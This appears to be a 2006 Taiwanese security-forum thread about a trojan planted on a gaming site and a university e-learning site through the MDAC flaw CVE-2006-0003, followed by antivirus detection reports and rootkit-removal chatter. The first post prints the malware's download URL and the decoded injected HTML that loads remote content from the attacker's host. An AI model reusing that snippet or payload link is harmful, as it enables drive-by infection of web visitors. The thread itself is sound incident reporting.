【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

Microsoft Windows MDAC 漏洞 - CVE-2006-0003：

作? ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下?使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
2個網站的木馬來源均指向"中央大學遠距教學網"
[CODE]
Http://140.115.135.135/magic/_ken/4x6/COMET.Exe
[/CODE]

比較特別的是將文件解碼後發現以下的語法:
[CODE]
<BODY scroll=yes>
<OBJECT style="DISPLAY: none" type=text/x-scriptlet height=0 width=0 data=mk:@MSITStore:mhtml:c:\.mht!

http://140.115.135.135/magic/_ken/4x6/hepl.txt::/%23%2E%68%74m></OBJECT></BODY>
</html>
[/CODE]

木馬植入及相關行為：

下載檔案及位置:

COMET.Exe
C:\Documents and Settings\user\Local Settings\Temporary Internet Files

之後更名轉存:

svchost.Exe
C:\Documents and Settings\user\Local Settings\Temp

自動執行後產生之檔案及位置:
C:\MP.EXE
C:\windows\loados.exe
C:\windows\mcsdos32.dll

造成　explorer.exe　程式錯誤。
造成　drwtsn32.exe　大量偵測及程式錯誤。
2者的錯誤造成幾乎當機的狀態。

其他：未知。

最近怎麼木馬滿天飛？還有網頁綁架事件層出不窮？

大部分的主流防毒都可測得，惟獨卡巴.....:|||:

已傳給卡巴分析（卡巴好像碰到加殼的毒就沒法度）:confused:

http://140.115.135.135/magic/_ken/4x6/COMET.Exe檔案下載後,"AntiVir PersonalEdition Premium" 11/10日病毒碼找到"HEUR/Malware"惡意程式~

77遊樂新世界 -> [url]http://www.77.com.tw/[/url] IE會自動下載 "****snow.exe"檔案,"AntiVir PersonalEdition Premium" 11/10日病毒碼找到"HEUR/Malware"惡意程式~

[QUOTE=fq4lxx92]最近怎麼木馬滿天飛？還有網頁綁架事件層出不窮？

大部分的主流防毒都可測得，惟獨卡巴.....:|||:

已傳給卡巴分析（卡巴好像碰到加殼的毒就沒法度）:confused:[/QUOTE]
卡巴6.0的脫殼能力是出了名的強

中獎網站不段攀升，中獎的人數可想而知了。
已經通知那2個網站的網管了。
77遊樂新世界.....已經回函說處理好了。
中央大學遠距教學網.......未知。

本人用的是諾頓2004，目前持續更新中。
諾頓的攔截方式應該是採用"病毒的行為模式"來攔截的。
不過會直接停掉使用中的瀏覽器(開好幾個分頁...一次全部關掉......-..-")。

11/13
PC-cillin 2007病毒碼:3.919.50

還掃不到

NOD32是靠啟發式引擎掃到的

BitDefender Antivirus v10
掃到
COMET.Exe Infected: Generic.Malware.dld!!.2E1E11A9

[QUOTE=hcchen]中獎網站不段攀升，中獎的人數可想而知了。
已經通知那2個網站的網管了。
77遊樂新世界.....已經回函說處理好了。[/QUOTE]
77遊樂新世界似乎又有新貨了top.exe:confused:
(ps.還附上網址:) )
[img]http://MystiPix.com/omrvesuv.jpg[/img]

77遊樂新世界有新貨
BitDefender Antivirus v10 掃到....
top.exe
infected with Trojan.Downloader.Small.BCK

2006-11-16, 晚上9:34分還有病毒嗎?

我開NOD32進去沒掃到

恭喜喔.......還在..............^^"

趕快把病毒樣本提報給卡巴斯基吧

[QUOTE=hn1271n]趕快把病毒樣本提報給卡巴斯基吧[/QUOTE]

問一下 怎嚜每次都你叫別人提報
自己不會提報嗎??

[QUOTE=harry_chang2003]問一下 怎嚜每次都你叫別人提報
自己不會提報嗎??[/QUOTE]
我使用的這台電腦內含極為重要的檔案,因此被規定嚴禁下載任何可能會導致操作不正常或是會導致資料外洩的病毒或是病毒樣本

[QUOTE=hn1271n]我使用的這台電腦內含極為重要的檔案,因此被規定嚴禁下載任何可能會導致操作不正常或是會導致資料外洩的病毒或是病毒樣本[/QUOTE]

竟然是內含有"極為重要的檔案"的電腦,那你還拿來上網,難道你沒有別的電腦可用嗎?
不怕[url]www.pczone.com.tw[/url] 也被植入木馬毀了你的"極為重要的檔案":|||:

PS:[url]www.pczone.com.tw[/url] 只是用來舉例說明,沒別的意思,再次特別聲明.:p

[QUOTE=DarkSkyline]竟然是內含有"極為重要的檔案"的電腦,那你還拿來上網,難道你沒有別的電腦可用嗎?
不怕[url]www.pczone.com.tw[/url] 也被植入木馬毀了你的"極為重要的檔案":|||:

PS:[url]www.pczone.com.tw[/url] 只是用來舉例說明,沒別的意思,再次特別聲明.:p[/QUOTE]
我也很想用別台電腦上網,可惜沒經費,至少要等到明年才有機會買新電腦

再者這台電腦也有按時打補釘,並內建性能極為優越的防火牆,每天防毒軟體至少全機掃描三次,不使用IE上網 ,也嚴禁下載來路不明的檔案,在執行新程式前也必先將有關檔案傳送給防毒公司進行分析,中毒的機率實在很低

[QUOTE=hn1271n]執行新程式前也必先將有關檔案傳送給防毒公司進行分析[/QUOTE]

感覺每次好像都是在此地發主題，號召志工(志願工作者)去傳的 :confused: :confused: :confused:

[QUOTE=tulipa]感覺好像都是在這邊發主題，號召這裡的人去傳的 :confused: :confused: :confused:[/QUOTE]
我指的是先把整片應用程式光碟先交給防毒公司檢查,我們這邊經費不多沒錢買新電腦但是有和防毒公司密切合作

[QUOTE=hn1271n]每天防毒軟體至少全機掃描三次.....[/QUOTE]
如果中了rootkit掃的到嗎?
答案是.........:|||:

[QUOTE=haol]如果中了rootkit掃的到嗎?
答案是.........:|||:[/QUOTE]

大部分的防毒廠商都可以偵測到Rootkit...只是偵測數量的多寡而已:)

[QUOTE=haol]如果中了rootkit掃的到嗎?
答案是.........:|||:[/QUOTE]
偵測很容易，只要加入病毒碼即可，但如果系統已經被Rootkit感染，那很多防毒軟體到現在都不行(不是他們沒有這個技術，而是非常可能造成系統不隱定，所以，不敢加此功能)。

[QUOTE=esjustin]大部分的防毒廠商都可以偵測到Rootkit...只是偵測數量的多寡而已:)[/QUOTE]
實際上並不是閣下所說那麼容易偵測到
遇到才知道.......
最近發現2個rootkit.ads.i
皆為.sys (試了f-xx跟soxx anti-rxx都lose)

試了一些工具hijackfrxx(看不到它載入項目:|||: )
還有試了一下費x殺手 kixx
到安全模式下也沒有辦法動到它，av沒發現當然刪不掉

也就是系統中了rootkit後反而被系統保護，你的av當然對它沒輒

[QUOTE=haol]實際上並不是閣下所說那麼容易偵測到
遇到才知道.......
最近發現2個rootkit.ads.i
皆為.sys (試了f-xx跟soxx anti-rxx都lose)

試了一些工具hijackfrxx(看不到它載入項目:|||: )
還有試了一下費x殺手 kixx
到安全模式下也沒有辦法動到它，av沒發現當然刪不掉

也就是系統中了rootkit後反而被系統保護，你av當然對它沒輒[/QUOTE]

試試看Kaspersky和BD吧...兩者的Anti-Rootkit都不在話下...:) (Kaspersky和BD 10都是內建的)

[QUOTE=haol]實際上並不是閣下所說那麼容易偵測到
遇到才知道.......
最近發現2個rootkit.ads.i
皆為.sys (試了f-xx跟soxx anti-rxx都lose)

試了一些工具hijackfrxx(看不到它載入項目:|||: )
還有試了一下費x殺手 kixx
到安全模式下也沒有辦法動到它，av沒發現當然刪不掉

也就是系統中了rootkit後反而被系統保護，你av當然對它沒輒[/QUOTE]
如果你用kav的話開啟行為判斷
絕對不會有漏網之魚

[QUOTE=esjustin]試試看Kaspersky和BD吧...兩者的Anti-Rootkit都不在話下...:) (Kaspersky和BD 10都是內建的)[/QUOTE]
當然不行
就算辨識也殺不掉
一開始只是在system32發現一隻dll的木馬，但是那隻木馬卻出奇的強韌，不只是沒有啟動項目，連一些費x殺手、killbxx and hijackthxx連安全模式下連動不了它（拒絕存取，右鍵也沒有剪下 刪除...），試了一些av重開機後還是存在:|||:

再來推測可能是rootkit，那台電腦沒裝kav
中了毒裝kav也殺不死，使用了f-xx跟soxx的anti-rxx沒反應

[url]http://en.wikipedia.org/wiki/Rootkit[/url]
這裡的某工具列出一些.sys可能有問題

也試了大陸的3家av線上
只有瑞x有反應
\system32\drivers axx46.sys rootkit.ads.i
\system32\axx46.dll Trojan.DL.QQHelper.emi

roorkit並不是想像中那樣
偵測難(對已中獎來說)，清除也難..
最後靠開機光碟的命令字元刪掉的......

FORMAT在重灌應該也可以

關於axx46.sys的樣本
上傳用virustotal掃，發現大多av都能偵測到，只是在感染時(\system32下)掃不到

1.在中鏢下不易察覺
2.無法清除
搜尋一下rootkit.ads.i，發現大陸很流行，都有殺不掉的情形....

請問sai7sai大大有清除rootkit的方法嗎?

[QUOTE=haol]當然不行就算辨識也殺不掉:|||:[/QUOTE]

該木馬應該可以複製吧...複製一份給Kaspersky...3個小時之後就抓得到了(1小時內回覆,2小時內更新)..:)

記得要求在病毒資料庫中加入解毒的方法...

[QUOTE=esjustin]該木馬應該可以複製吧...複製一份給Kaspersky...3個小時之後就抓得到了(1小時內回覆,2小時內更新)..:)

記得要求在病毒資料庫中加入解毒的方法...[/QUOTE]
重點是動不了它(.sys)，當然無法複製
安全模式下也一樣無法存取(這個檔案使用中...)
有沒有這麼好玩，試過才是知道

現在解決了
只是防毒軟體能偵測隱藏的rootkit嗎??